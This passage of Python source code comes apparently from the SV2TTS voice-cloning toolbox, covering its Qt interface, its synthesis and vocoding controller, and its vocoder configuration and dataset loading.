Use the vocoder to generate audio.\nThe vocoder generates almost in constant " \ "time, so it will be more time efficient for longer inputs like this one.\nOn the left you " \ "have the embedding projections. Load or record more utterances to see them.\nIf you have " \ "at least 2 or 3 utterances from a same speaker, a cluster should form.\nSynthesized " \ "utterances are of the same color as the speaker whose voice was used, but they're " \ "represented with a cross." class UI(QDialog): min_umap_points = 4 max_log_lines = 5 max_saved_utterances = 20 def draw_utterance(self, utterance: Utterance, which): self.draw_spec(utterance.spec, which) self.draw_embed(utterance.embed, utterance.name, which) def draw_embed(self, embed, name, which): embed_ax, _ = self.current_ax if which == "current" else self.gen_ax embed_ax.figure.suptitle("" if embed is None else name) ## Embedding # Clear the plot if len(embed_ax.images) > 0: embed_ax.images[0].colorbar.remove() embed_ax.clear() # Draw the embed if embed is not None: plot_embedding_as_heatmap(embed, embed_ax) embed_ax.set_title("embedding") embed_ax.set_aspect("equal", "datalim") embed_ax.set_xticks([]) embed_ax.set_yticks([]) embed_ax.figure.canvas.draw() def draw_spec(self, spec, which): _, spec_ax = self.current_ax if which == "current" else self.gen_ax ## Spectrogram # Draw the spectrogram spec_ax.clear() if spec is not None: spec_ax.imshow(spec, aspect="auto", interpolation="none") spec_ax.set_title("mel spectrogram") spec_ax.set_xticks([]) spec_ax.set_yticks([]) spec_ax.figure.canvas.draw() if which != "current": self.vocode_button.setDisabled(spec is None) def draw_umap_projections(self, utterances: Set[Utterance]): self.umap_ax.clear() speakers = np.unique([u.speaker_name for u in utterances]) colors = {speaker_name: colormap[i] for i, speaker_name in enumerate(speakers)} embeds = [u.embed for u in utterances] # Display a message if there aren't enough points if len(utterances) < self.min_umap_points: self.umap_ax.text(.5, .5, "Add %d more points to\ngenerate the projections" % (self.min_umap_points - len(utterances)), horizontalalignment='center', fontsize=15) self.umap_ax.set_title("") # Compute the projections else: if not self.umap_hot: self.log( "Drawing UMAP projections for the first time, this will take a few seconds.") self.umap_hot = True reducer = umap.UMAP(int(np.ceil(np.sqrt(len(embeds)))), metric="cosine") projections = reducer.fit_transform(embeds) speakers_done = set() for projection, utterance in zip(projections, utterances): color = colors[utterance.speaker_name] mark = "x" if "_gen_" in utterance.name else "o" label = None if utterance.speaker_name in speakers_done else utterance.speaker_name speakers_done.add(utterance.speaker_name) self.umap_ax.scatter(projection[0], projection[1], c=[color], marker=mark, label=label) self.umap_ax.legend(prop={'size': 10}) # Draw the plot self.umap_ax.set_aspect("equal", "datalim") self.umap_ax.set_xticks([]) self.umap_ax.set_yticks([]) self.umap_ax.figure.canvas.draw() def save_audio_file(self, wav, sample_rate): dialog = QFileDialog() dialog.setDefaultSuffix(".wav") fpath, _ = dialog.getSaveFileName( parent=self, caption="Select a path to save the audio file", filter="Audio Files (*.flac *.wav)" ) if fpath: #Default format is wav if Path(fpath).suffix == "": fpath += ".wav" sf.write(fpath, wav, sample_rate) def setup_audio_devices(self, sample_rate): input_devices = [] output_devices = [] for device in sd.query_devices(): # Check if valid input try: 
sd.check_input_settings(device=device["name"], samplerate=sample_rate) input_devices.append(device["name"]) except: pass # Check if valid output try: sd.check_output_settings(device=device["name"], samplerate=sample_rate) output_devices.append(device["name"]) except Exception as e: # Log a warning only if the device is not an input if not device["name"] in input_devices: warn("Unsupported output device %s for the sample rate: %d \nError: %s" % (device["name"], sample_rate, str(e))) if len(input_devices) == 0: self.log("No audio input device detected. Recording may not work.") self.audio_in_device = None else: self.audio_in_device = input_devices[0] if len(output_devices) == 0: self.log("No supported output audio devices were found! Audio output may not work.") self.audio_out_devices_cb.addItems(["None"]) self.audio_out_devices_cb.setDisabled(True) else: self.audio_out_devices_cb.clear() self.audio_out_devices_cb.addItems(output_devices) self.audio_out_devices_cb.currentTextChanged.connect(self.set_audio_device) self.set_audio_device() def set_audio_device(self): output_device = self.audio_out_devices_cb.currentText() if output_device == "None": output_device = None # If None, sounddevice queries portaudio sd.default.device = (self.audio_in_device, output_device) def play(self, wav, sample_rate): try: sd.stop() sd.play(wav, sample_rate) except Exception as e: print(e) self.log("Error in audio playback. Try selecting a different audio output device.") self.log("Your device must be connected before you start the toolbox.") def stop(self): sd.stop() def record_one(self, sample_rate, duration): self.record_button.setText("Recording...") self.record_button.setDisabled(True) self.log("Recording %d seconds of audio" % duration) sd.stop() try: wav = sd.rec(duration * sample_rate, sample_rate, 1) except Exception as e: print(e) self.log("Could not record anything. Is your recording device enabled?") self.log("Your device must be connected before you start the toolbox.") return None for i in np.arange(0, duration, 0.1): self.set_loading(i, duration) sleep(0.1) self.set_loading(duration, duration) sd.wait() self.log("Done recording.") self.record_button.setText("Record") self.record_button.setDisabled(False) return wav.squeeze() @property def current_dataset_name(self): return self.dataset_box.currentText() @property def current_speaker_name(self): return self.speaker_box.currentText() @property def current_utterance_name(self): return self.utterance_box.currentText() def browse_file(self): fpath = QFileDialog().getOpenFileName( parent=self, caption="Select an audio file", filter="Audio Files (*.mp3 *.flac *.wav *.m4a)" ) return Path(fpath[0]) if fpath[0] != "" else "" @staticmethod def repopulate_box(box, items, random=False): """ Resets a box and adds a list of items. 
Pass a list of (item, data) pairs instead to join data to the items """ box.blockSignals(True) box.clear() for item in items: item = list(item) if isinstance(item, tuple) else [item] box.addItem(str(item[0]), *item[1:]) if len(items) > 0: box.setCurrentIndex(np.random.randint(len(items)) if random else 0) box.setDisabled(len(items) == 0) box.blockSignals(False) def populate_browser(self, datasets_root: Path, recognized_datasets: List, level: int, random=True): # Select a random dataset if level <= 0: if datasets_root is not None: datasets = [datasets_root.joinpath(d) for d in recognized_datasets] datasets = [d.relative_to(datasets_root) for d in datasets if d.exists()] self.browser_load_button.setDisabled(len(datasets) == 0) if datasets_root is None or len(datasets) == 0: msg = "Warning: you d" + ("id not pass a root directory for datasets as argument" \ if datasets_root is None else "o not have any of the recognized datasets" \ " in %s" % datasets_root) self.log(msg) msg += ".\nThe recognized datasets are:\n\t%s\nFeel free to add your own. You " \ "can still use the toolbox by recording samples yourself." % \ ("\n\t".join(recognized_datasets)) print(msg, file=sys.stderr) self.random_utterance_button.setDisabled(True) self.random_speaker_button.setDisabled(True) self.random_dataset_button.setDisabled(True) self.utterance_box.setDisabled(True) self.speaker_box.setDisabled(True) self.dataset_box.setDisabled(True) self.browser_load_button.setDisabled(True) self.auto_next_checkbox.setDisabled(True) return self.repopulate_box(self.dataset_box, datasets, random) # Select a random speaker if level <= 1: speakers_root = datasets_root.joinpath(self.current_dataset_name) speaker_names = [d.stem for d in speakers_root.glob("*") if d.is_dir()] self.repopulate_box(self.speaker_box, speaker_names, random) # Select a random utterance if level <= 2: utterances_root = datasets_root.joinpath( self.current_dataset_name, self.current_speaker_name ) utterances = [] for extension in ['mp3', 'flac', 'wav', 'm4a']: utterances.extend(Path(utterances_root).glob("**/*.%s" % extension)) utterances = [fpath.relative_to(utterances_root) for fpath in utterances] self.repopulate_box(self.utterance_box, utterances, random) def browser_select_next(self): index = (self.utterance_box.currentIndex() + 1) % len(self.utterance_box) self.utterance_box.setCurrentIndex(index) @property def current_encoder_fpath(self): return self.encoder_box.itemData(self.encoder_box.currentIndex()) @property def current_synthesizer_fpath(self): return self.synthesizer_box.itemData(self.synthesizer_box.currentIndex()) @property def current_vocoder_fpath(self): return self.vocoder_box.itemData(self.vocoder_box.currentIndex()) def populate_models(self, models_dir: Path): # Encoder encoder_fpaths = list(models_dir.glob("*/encoder.pt")) if len(encoder_fpaths) == 0: raise Exception("No encoder models found in %s" % models_dir) self.repopulate_box(self.encoder_box, [(f.parent.name, f) for f in encoder_fpaths]) # Synthesizer synthesizer_fpaths = list(models_dir.glob("*/synthesizer.pt")) if len(synthesizer_fpaths) == 0: raise Exception("No synthesizer models found in %s" % models_dir) self.repopulate_box(self.synthesizer_box, [(f.parent.name, f) for f in synthesizer_fpaths]) # Vocoder vocoder_fpaths = list(models_dir.glob("*/vocoder.pt")) vocoder_items = [(f.parent.name, f) for f in vocoder_fpaths] + [("Griffin-Lim", None)] self.repopulate_box(self.vocoder_box, vocoder_items) @property def selected_utterance(self): return 
self.utterance_history.itemData(self.utterance_history.currentIndex()) def register_utterance(self, utterance: Utterance): self.utterance_history.blockSignals(True) self.utterance_history.insertItem(0, utterance.name, utterance) self.utterance_history.setCurrentIndex(0) self.utterance_history.blockSignals(False) if len(self.utterance_history) > self.max_saved_utterances: self.utterance_history.removeItem(self.max_saved_utterances) self.play_button.setDisabled(False) self.generate_button.setDisabled(False) self.synthesize_button.setDisabled(False) def log(self, line, mode="newline"): if mode == "newline": self.logs.append(line) if len(self.logs) > self.max_log_lines: del self.logs[0] elif mode == "append": self.logs[-1] += line elif mode == "overwrite": self.logs[-1] = line log_text = '\n'.join(self.logs) self.log_window.setText(log_text) self.app.processEvents() def set_loading(self, value, maximum=1): self.loading_bar.setValue(value * 100) self.loading_bar.setMaximum(maximum * 100) self.loading_bar.setTextVisible(value != 0) self.app.processEvents() def populate_gen_options(self, seed, trim_silences): if seed is not None: self.random_seed_checkbox.setChecked(True) self.seed_textbox.setText(str(seed)) self.seed_textbox.setEnabled(True) else: self.random_seed_checkbox.setChecked(False) self.seed_textbox.setText(str(0)) self.seed_textbox.setEnabled(False) if not trim_silences: self.trim_silences_checkbox.setChecked(False) self.trim_silences_checkbox.setDisabled(True) def update_seed_textbox(self): if self.random_seed_checkbox.isChecked(): self.seed_textbox.setEnabled(True) else: self.seed_textbox.setEnabled(False) def reset_interface(self): self.draw_embed(None, None, "current") self.draw_embed(None, None, "generated") self.draw_spec(None, "current") self.draw_spec(None, "generated") self.draw_umap_projections(set()) self.set_loading(0) self.play_button.setDisabled(True) self.generate_button.setDisabled(True) self.synthesize_button.setDisabled(True) self.vocode_button.setDisabled(True) self.replay_wav_button.setDisabled(True) self.export_wav_button.setDisabled(True) [self.log("") for _ in range(self.max_log_lines)] def __init__(self): ## Initialize the application self.app = QApplication(sys.argv) super().__init__(None) self.setWindowTitle("SV2TTS toolbox") ## Main layouts # Root root_layout = QGridLayout() self.setLayout(root_layout) # Browser browser_layout = QGridLayout() root_layout.addLayout(browser_layout, 0, 0, 1, 2) # Generation gen_layout = QVBoxLayout() root_layout.addLayout(gen_layout, 0, 2, 1, 2) # Projections self.projections_layout = QVBoxLayout() root_layout.addLayout(self.projections_layout, 1, 0, 1, 1) # Visualizations vis_layout = QVBoxLayout() root_layout.addLayout(vis_layout, 1, 1, 1, 3) ## Projections # UMap fig, self.umap_ax = plt.subplots(figsize=(3, 3), facecolor="#F0F0F0") fig.subplots_adjust(left=0.02, bottom=0.02, right=0.98, top=0.98) self.projections_layout.addWidget(FigureCanvas(fig)) self.umap_hot = False self.clear_button = QPushButton("Clear") self.projections_layout.addWidget(self.clear_button) ## Browser # Dataset, speaker and utterance selection i = 0 self.dataset_box = QComboBox() browser_layout.addWidget(QLabel("<b>Dataset</b>"), i, 0) browser_layout.addWidget(self.dataset_box, i + 1, 0) self.speaker_box = QComboBox() browser_layout.addWidget(QLabel("<b>Speaker</b>"), i, 1) browser_layout.addWidget(self.speaker_box, i + 1, 1) self.utterance_box = QComboBox() browser_layout.addWidget(QLabel("<b>Utterance</b>"), i, 2) 
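        # Each browser control spans two grid rows: the bold QLabel header sits on row i and the
        # matching combo box on row i + 1, which is why i is advanced by 2 after such blocks.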
browser_layout.addWidget(self.utterance_box, i + 1, 2) self.browser_load_button = QPushButton("Load") browser_layout.addWidget(self.browser_load_button, i + 1, 3) i += 2 # Random buttons self.random_dataset_button = QPushButton("Random") browser_layout.addWidget(self.random_dataset_button, i, 0) self.random_speaker_button = QPushButton("Random") browser_layout.addWidget(self.random_speaker_button, i, 1) self.random_utterance_button = QPushButton("Random") browser_layout.addWidget(self.random_utterance_button, i, 2) self.auto_next_checkbox = QCheckBox("Auto select next") self.auto_next_checkbox.setChecked(True) browser_layout.addWidget(self.auto_next_checkbox, i, 3) i += 1 # Utterance box browser_layout.addWidget(QLabel("<b>Use embedding from:</b>"), i, 0) self.utterance_history = QComboBox() browser_layout.addWidget(self.utterance_history, i, 1, 1, 3) i += 1 # Random & next utterance buttons self.browser_browse_button = QPushButton("Browse") browser_layout.addWidget(self.browser_browse_button, i, 0) self.record_button = QPushButton("Record") browser_layout.addWidget(self.record_button, i, 1) self.play_button = QPushButton("Play") browser_layout.addWidget(self.play_button, i, 2) self.stop_button = QPushButton("Stop") browser_layout.addWidget(self.stop_button, i, 3) i += 1 # Model and audio output selection self.encoder_box = QComboBox() browser_layout.addWidget(QLabel("<b>Encoder</b>"), i, 0) browser_layout.addWidget(self.encoder_box, i + 1, 0) self.synthesizer_box = QComboBox() browser_layout.addWidget(QLabel("<b>Synthesizer</b>"), i, 1) browser_layout.addWidget(self.synthesizer_box, i + 1, 1) self.vocoder_box = QComboBox() browser_layout.addWidget(QLabel("<b>Vocoder</b>"), i, 2) browser_layout.addWidget(self.vocoder_box, i + 1, 2) self.audio_out_devices_cb=QComboBox() browser_layout.addWidget(QLabel("<b>Audio Output</b>"), i, 3) browser_layout.addWidget(self.audio_out_devices_cb, i + 1, 3) i += 2 #Replay & Save Audio browser_layout.addWidget(QLabel("<b>Toolbox Output:</b>"), i, 0) self.waves_cb = QComboBox() self.waves_cb_model = QStringListModel() self.waves_cb.setModel(self.waves_cb_model) self.waves_cb.setToolTip("Select one of the last generated waves in this section for replaying or exporting") browser_layout.addWidget(self.waves_cb, i, 1) self.replay_wav_button = QPushButton("Replay") self.replay_wav_button.setToolTip("Replay last generated vocoder") browser_layout.addWidget(self.replay_wav_button, i, 2) self.export_wav_button = QPushButton("Export") self.export_wav_button.setToolTip("Save last generated vocoder audio in filesystem as a wav file") browser_layout.addWidget(self.export_wav_button, i, 3) i += 1 ## Embed & spectrograms vis_layout.addStretch() gridspec_kw = {"width_ratios": [1, 4]} fig, self.current_ax = plt.subplots(1, 2, figsize=(10, 2.25), facecolor="#F0F0F0", gridspec_kw=gridspec_kw) fig.subplots_adjust(left=0, bottom=0.1, right=1, top=0.8) vis_layout.addWidget(FigureCanvas(fig)) fig, self.gen_ax = plt.subplots(1, 2, figsize=(10, 2.25), facecolor="#F0F0F0", gridspec_kw=gridspec_kw) fig.subplots_adjust(left=0, bottom=0.1, right=1, top=0.8) vis_layout.addWidget(FigureCanvas(fig)) for ax in self.current_ax.tolist() + self.gen_ax.tolist(): ax.set_facecolor("#F0F0F0") for side in ["top", "right", "bottom", "left"]: ax.spines[side].set_visible(False) ## Generation self.text_prompt = QPlainTextEdit(default_text) gen_layout.addWidget(self.text_prompt, stretch=1) self.generate_button = QPushButton("Synthesize and vocode") gen_layout.addWidget(self.generate_button) layout = 
QHBoxLayout() self.synthesize_button = QPushButton("Synthesize only") layout.addWidget(self.synthesize_button) self.vocode_button = QPushButton("Vocode only") layout.addWidget(self.vocode_button) gen_layout.addLayout(layout) layout_seed = QGridLayout() self.random_seed_checkbox = QCheckBox("Random seed:") self.random_seed_checkbox.setToolTip("When checked, makes the synthesizer and vocoder deterministic.") layout_seed.addWidget(self.random_seed_checkbox, 0, 0) self.seed_textbox = QLineEdit() self.seed_textbox.setMaximumWidth(80) layout_seed.addWidget(self.seed_textbox, 0, 1) self.trim_silences_checkbox = QCheckBox("Enhance vocoder output") self.trim_silences_checkbox.setToolTip("When checked, trims excess silence in vocoder output." " This feature requires `webrtcvad` to be installed.") layout_seed.addWidget(self.trim_silences_checkbox, 0, 2, 1, 2) gen_layout.addLayout(layout_seed) self.loading_bar = QProgressBar() gen_layout.addWidget(self.loading_bar) self.log_window = QLabel() self.log_window.setAlignment(Qt.AlignBottom | Qt.AlignLeft) gen_layout.addWidget(self.log_window) self.logs = [] gen_layout.addStretch() ## Set the size of the window and of the elements max_size = QDesktopWidget().availableGeometry(self).size() * 0.8 self.resize(max_size) ## Finalize the display self.reset_interface() self.show() def start(self): self.app.exec_() File: toolbox/__init__.py import sys import traceback from pathlib import Path from time import perf_counter as timer import numpy as np import torch from encoder import inference as encoder from synthesizer.inference import Synthesizer from toolbox.ui import UI from toolbox.utterance import Utterance from vocoder import inference as vocoder # Use this directory structure for your datasets, or modify it to fit your needs recognized_datasets = [ "LibriSpeech/dev-clean", "LibriSpeech/dev-other", "LibriSpeech/test-clean", "LibriSpeech/test-other", "LibriSpeech/train-clean-100", "LibriSpeech/train-clean-360", "LibriSpeech/train-other-500", "LibriTTS/dev-clean", "LibriTTS/dev-other", "LibriTTS/test-clean", "LibriTTS/test-other", "LibriTTS/train-clean-100", "LibriTTS/train-clean-360", "LibriTTS/train-other-500", "LJSpeech-1.1", "VoxCeleb1/wav", "VoxCeleb1/test_wav", "VoxCeleb2/dev/aac", "VoxCeleb2/test/aac", "VCTK-Corpus/wav48", ] # Maximum of generated wavs to keep on memory MAX_WAVS = 15 class Toolbox: def __init__(self, datasets_root: Path, models_dir: Path, seed: int=None): sys.excepthook = self.excepthook self.datasets_root = datasets_root self.utterances = set() self.current_generated = (None, None, None, None) # speaker_name, spec, breaks, wav self.synthesizer = None # type: Synthesizer self.current_wav = None self.waves_list = [] self.waves_count = 0 self.waves_namelist = [] # Check for webrtcvad (enables removal of silences in vocoder output) try: import webrtcvad self.trim_silences = True except: self.trim_silences = False # Initialize the events and the interface self.ui = UI() self.reset_ui(models_dir, seed) self.setup_events() self.ui.start() def excepthook(self, exc_type, exc_value, exc_tb): traceback.print_exception(exc_type, exc_value, exc_tb) self.ui.log("Exception: %s" % exc_value) def setup_events(self): # Dataset, speaker and utterance selection self.ui.browser_load_button.clicked.connect(lambda: self.load_from_browser()) random_func = lambda level: lambda: self.ui.populate_browser(self.datasets_root, recognized_datasets, level) self.ui.random_dataset_button.clicked.connect(random_func(0)) 
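        # random_func(level) returns a closure that repopulates the browser from that level down:
        # 0 = dataset, 1 = speaker, 2 = utterance. The same callbacks are reused below so that
        # changing the dataset or speaker selection refreshes the lists beneath it.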
self.ui.random_speaker_button.clicked.connect(random_func(1)) self.ui.random_utterance_button.clicked.connect(random_func(2)) self.ui.dataset_box.currentIndexChanged.connect(random_func(1)) self.ui.speaker_box.currentIndexChanged.connect(random_func(2)) # Model selection self.ui.encoder_box.currentIndexChanged.connect(self.init_encoder) def func(): self.synthesizer = None self.ui.synthesizer_box.currentIndexChanged.connect(func) self.ui.vocoder_box.currentIndexChanged.connect(self.init_vocoder) # Utterance selection func = lambda: self.load_from_browser(self.ui.browse_file()) self.ui.browser_browse_button.clicked.connect(func) func = lambda: self.ui.draw_utterance(self.ui.selected_utterance, "current") self.ui.utterance_history.currentIndexChanged.connect(func) func = lambda: self.ui.play(self.ui.selected_utterance.wav, Synthesizer.sample_rate) self.ui.play_button.clicked.connect(func) self.ui.stop_button.clicked.connect(self.ui.stop) self.ui.record_button.clicked.connect(self.record) #Audio self.ui.setup_audio_devices(Synthesizer.sample_rate) #Wav playback & save func = lambda: self.replay_last_wav() self.ui.replay_wav_button.clicked.connect(func) func = lambda: self.export_current_wave() self.ui.export_wav_button.clicked.connect(func) self.ui.waves_cb.currentIndexChanged.connect(self.set_current_wav) # Generation func = lambda: self.synthesize() or self.vocode() self.ui.generate_button.clicked.connect(func) self.ui.synthesize_button.clicked.connect(self.synthesize) self.ui.vocode_button.clicked.connect(self.vocode) self.ui.random_seed_checkbox.clicked.connect(self.update_seed_textbox) # UMAP legend self.ui.clear_button.clicked.connect(self.clear_utterances) def set_current_wav(self, index): self.current_wav = self.waves_list[index] def export_current_wave(self): self.ui.save_audio_file(self.current_wav, Synthesizer.sample_rate) def replay_last_wav(self): self.ui.play(self.current_wav, Synthesizer.sample_rate) def reset_ui(self, models_dir: Path, seed: int=None): self.ui.populate_browser(self.datasets_root, recognized_datasets, 0, True) self.ui.populate_models(models_dir) self.ui.populate_gen_options(seed, self.trim_silences) def load_from_browser(self, fpath=None): if fpath is None: fpath = Path(self.datasets_root, self.ui.current_dataset_name, self.ui.current_speaker_name, self.ui.current_utterance_name) name = str(fpath.relative_to(self.datasets_root)) speaker_name = self.ui.current_dataset_name + '_' + self.ui.current_speaker_name # Select the next utterance if self.ui.auto_next_checkbox.isChecked(): self.ui.browser_select_next() elif fpath == "": return else: name = fpath.name speaker_name = fpath.parent.name # Get the wav from the disk. 
We take the wav with the vocoder/synthesizer format for # playback, so as to have a fair comparison with the generated audio wav = Synthesizer.load_preprocess_wav(fpath) self.ui.log("Loaded %s" % name) self.add_real_utterance(wav, name, speaker_name) def record(self): wav = self.ui.record_one(encoder.sampling_rate, 5) if wav is None: return self.ui.play(wav, encoder.sampling_rate) speaker_name = "user01" name = speaker_name + "_rec_%05d" % np.random.randint(100000) self.add_real_utterance(wav, name, speaker_name) def add_real_utterance(self, wav, name, speaker_name): # Compute the mel spectrogram spec = Synthesizer.make_spectrogram(wav) self.ui.draw_spec(spec, "current") # Compute the embedding if not encoder.is_loaded(): self.init_encoder() encoder_wav = encoder.preprocess_wav(wav) embed, partial_embeds, _ = encoder.embed_utterance(encoder_wav, return_partials=True) # Add the utterance utterance = Utterance(name, speaker_name, wav, spec, embed, partial_embeds, False) self.utterances.add(utterance) self.ui.register_utterance(utterance) # Plot it self.ui.draw_embed(embed, name, "current") self.ui.draw_umap_projections(self.utterances) def clear_utterances(self): self.utterances.clear() self.ui.draw_umap_projections(self.utterances) def synthesize(self): self.ui.log("Generating the mel spectrogram...") self.ui.set_loading(1) # Update the synthesizer random seed if self.ui.random_seed_checkbox.isChecked(): seed = int(self.ui.seed_textbox.text()) self.ui.populate_gen_options(seed, self.trim_silences) else: seed = None if seed is not None: torch.manual_seed(seed) # Synthesize the spectrogram if self.synthesizer is None or seed is not None: self.init_synthesizer() texts = self.ui.text_prompt.toPlainText().split("\n") embed = self.ui.selected_utterance.embed embeds = [embed] * len(texts) specs = self.synthesizer.synthesize_spectrograms(texts, embeds) breaks = [spec.shape[1] for spec in specs] spec = np.concatenate(specs, axis=1) self.ui.draw_spec(spec, "generated") self.current_generated = (self.ui.selected_utterance.speaker_name, spec, breaks, None) self.ui.set_loading(0) def vocode(self): speaker_name, spec, breaks, _ = self.current_generated assert spec is not None # Initialize the vocoder model and make it determinstic, if user provides a seed if self.ui.random_seed_checkbox.isChecked(): seed = int(self.ui.seed_textbox.text()) self.ui.populate_gen_options(seed, self.trim_silences) else: seed = None if seed is not None: torch.manual_seed(seed) # Synthesize the waveform if not vocoder.is_loaded() or seed is not None: self.init_vocoder() def vocoder_progress(i, seq_len, b_size, gen_rate): real_time_factor = (gen_rate / Synthesizer.sample_rate) * 1000 line = "Waveform generation: %d/%d (batch size: %d, rate: %.1fkHz - %.2fx real time)" \ % (i * b_size, seq_len * b_size, b_size, gen_rate, real_time_factor) self.ui.log(line, "overwrite") self.ui.set_loading(i, seq_len) if self.ui.current_vocoder_fpath is not None: self.ui.log("") wav = vocoder.infer_waveform(spec, progress_callback=vocoder_progress) else: self.ui.log("Waveform generation with Griffin-Lim... 
") wav = Synthesizer.griffin_lim(spec) self.ui.set_loading(0) self.ui.log(" Done!", "append") # Add breaks b_ends = np.cumsum(np.array(breaks) * Synthesizer.hparams.hop_size) b_starts = np.concatenate(([0], b_ends[:-1])) wavs = [wav[start:end] for start, end, in zip(b_starts, b_ends)] breaks = [np.zeros(int(0.15 * Synthesizer.sample_rate))] * len(breaks) wav = np.concatenate([i for w, b in zip(wavs, breaks) for i in (w, b)]) # Trim excessive silences if self.ui.trim_silences_checkbox.isChecked(): wav = encoder.preprocess_wav(wav) # Play it wav = wav / np.abs(wav).max() * 0.97 self.ui.play(wav, Synthesizer.sample_rate) # Name it (history displayed in combobox) # TODO better naming for the combobox items? wav_name = str(self.waves_count + 1) #Update waves combobox self.waves_count += 1 if self.waves_count > MAX_WAVS: self.waves_list.pop() self.waves_namelist.pop() self.waves_list.insert(0, wav) self.waves_namelist.insert(0, wav_name) self.ui.waves_cb.disconnect() self.ui.waves_cb_model.setStringList(self.waves_namelist) self.ui.waves_cb.setCurrentIndex(0) self.ui.waves_cb.currentIndexChanged.connect(self.set_current_wav) # Update current wav self.set_current_wav(0) #Enable replay and save buttons: self.ui.replay_wav_button.setDisabled(False) self.ui.export_wav_button.setDisabled(False) # Compute the embedding # TODO: this is problematic with different sampling rates, gotta fix it if not encoder.is_loaded(): self.init_encoder() encoder_wav = encoder.preprocess_wav(wav) embed, partial_embeds, _ = encoder.embed_utterance(encoder_wav, return_partials=True) # Add the utterance name = speaker_name + "_gen_%05d" % np.random.randint(100000) utterance = Utterance(name, speaker_name, wav, spec, embed, partial_embeds, True) self.utterances.add(utterance) # Plot it self.ui.draw_embed(embed, name, "generated") self.ui.draw_umap_projections(self.utterances) def init_encoder(self): model_fpath = self.ui.current_encoder_fpath self.ui.log("Loading the encoder %s... " % model_fpath) self.ui.set_loading(1) start = timer() encoder.load_model(model_fpath) self.ui.log("Done (%dms)." % int(1000 * (timer() - start)), "append") self.ui.set_loading(0) def init_synthesizer(self): model_fpath = self.ui.current_synthesizer_fpath self.ui.log("Loading the synthesizer %s... " % model_fpath) self.ui.set_loading(1) start = timer() self.synthesizer = Synthesizer(model_fpath) self.ui.log("Done (%dms)." % int(1000 * (timer() - start)), "append") self.ui.set_loading(0) def init_vocoder(self): model_fpath = self.ui.current_vocoder_fpath # Case of Griffin-lim if model_fpath is None: return self.ui.log("Loading the vocoder %s... " % model_fpath) self.ui.set_loading(1) start = timer() vocoder.load_model(model_fpath) self.ui.log("Done (%dms)." 
% int(1000 * (timer() - start)), "append") self.ui.set_loading(0) def update_seed_textbox(self): self.ui.update_seed_textbox() File: vocoder/hparams.py from synthesizer.hparams import hparams as _syn_hp # Audio settings------------------------------------------------------------------------ # Match the values of the synthesizer sample_rate = _syn_hp.sample_rate n_fft = _syn_hp.n_fft num_mels = _syn_hp.num_mels hop_length = _syn_hp.hop_size win_length = _syn_hp.win_size fmin = _syn_hp.fmin min_level_db = _syn_hp.min_level_db ref_level_db = _syn_hp.ref_level_db mel_max_abs_value = _syn_hp.max_abs_value preemphasis = _syn_hp.preemphasis apply_preemphasis = _syn_hp.preemphasize bits = 9 # bit depth of signal mu_law = True # Recommended to suppress noise if using raw bits in hp.voc_mode # below # WAVERNN / VOCODER -------------------------------------------------------------------------------- voc_mode = 'RAW' # either 'RAW' (softmax on raw bits) or 'MOL' (sample from # mixture of logistics) voc_upsample_factors = (5, 5, 8) # NB - this needs to correctly factorise hop_length voc_rnn_dims = 512 voc_fc_dims = 512 voc_compute_dims = 128 voc_res_out_dims = 128 voc_res_blocks = 10 # Training voc_batch_size = 100 voc_lr = 1e-4 voc_gen_at_checkpoint = 5 # number of samples to generate at each checkpoint voc_pad = 2 # this will pad the input so that the resnet can 'see' wider # than input length voc_seq_len = hop_length * 5 # must be a multiple of hop_length # Generating / Synthesizing voc_gen_batched = True # very fast (realtime+) single utterance batched generation voc_target = 8000 # target number of samples to be generated in each batch entry voc_overlap = 400 # number of samples for crossfading between batches File: vocoder/vocoder_dataset.py from torch.utils.data import Dataset from pathlib import Path from vocoder import audio import vocoder.hparams as hp import numpy as np import torch class VocoderDataset(Dataset): def __init__(self, metadata_fpath: Path, mel_dir: Path, wav_dir: Path): print("Using inputs from:\n\t%s\n\t%s\n\t%s" % (metadata_fpath, mel_dir, wav_dir)) with metadata_fpath.open("r") as metadata_file: metadata = [line.split("|") for line in metadata_file] gta_fnames = [x[1] for x in metadata if int(x[4])] gta_fpaths = [mel_dir.joinpath(fname) for fname in gta_fnames] wav_fnames = [x[0] for x in metadata if int(x[4])] wav_fpaths = [wav_dir.joinpath(fname) for fname in wav_fnames] self.samples_fpaths = list(zip(gta_fpaths, wav_fpaths)) print("Found %d samples" % len(self.samples_fpaths)) def __getitem__(self, index): mel_path, wav_path = self.samples_fpaths[index] # Load the mel spectrogram and adjust its range to [-1, 1] mel = np.load(mel_path).T.astype(np.float32) / hp.mel_max_abs_value # Load the wav wav = np.load(wav_path) if hp.apply_preemphasis: wav = audio.pre_emphasis(wav) wav = np.clip(wav, -1, 1) # Fix for missing padding # TODO: settle on whether this is any useful r_pad = (len(wav) // hp.hop_length + 1) * hp.hop_length - len(wav) wav = np.pad(wav, (0, r_pad), mode='constant') assert len(wav) >= mel.shape[1] * hp.hop_length wav = wav[:mel.shape[1] * hp.hop_length] assert len(wav) % hp.hop_length == 0 # Quantize the wav if hp.voc_mode == 'RAW': if hp.mu_law: quant = audio.encode_mu_law(wav, mu=2 ** hp.bits) else: quant = audio.float_2_label(wav, bits=hp.bits) elif hp.voc_mode == 'MOL': quant = audio.float_2_label(wav, bits=16) return mel.astype(np.float32), quant.astype(np.int64) def __len__(self): return len(self.samples_fpaths) def collate_vocoder(batch): mel_win = 
hp.voc_seq_len // hp.hop_length + 2 * hp.voc_pad max_offsets = [x[0].shape[-1] -2 - (mel_win + 2 * hp.voc_pad) for x in batch] mel_offsets = [np.random.randint(0, offset) for offset in max_offsets] sig_offsets = [(offset + hp.voc_pad) * hp.hop_length for offset in mel_offsets] mels = [x[0][:, mel_offsets[i]:mel_offsets[i] + mel_win] for i, x in enumerate(batch)] labels = [x[1][sig_offsets[i]:sig_offsets[i] + hp.voc_seq_len + 1] for i, x in enumerate(batch)] mels = np.stack(mels).astype(np.float32) labels = np.stack(labels).astype(np.int64) mels = torch.tensor(mels) labels = torch.tensor(labels).long() x = labels[:, :hp.voc_seq_len] y = labels[:, 1:] bits = 16 if hp.voc_mode == 'MOL' else hp.bits x = audio.label_2_float(x.float(), bits) if hp.voc_mode == 'MOL' : y = audio.label_2_float(y.float(), bits) return x, y, mels File: vocoder/display.py import time import numpy as np import sys def progbar(i, n, size=16): done = (i * size) // n bar = '' for i in range(size): bar += '█' if i <= done else '░' return bar def stream(message) : try: sys.stdout.write("\r{%s}" % message) except: #Remove non-ASCII characters from message message = ''.join(i for i in message if ord(i)<128) sys.stdout.write("\r{%s}" % message) def simple_table(item_tuples) : border_pattern = '+---------------------------------------' 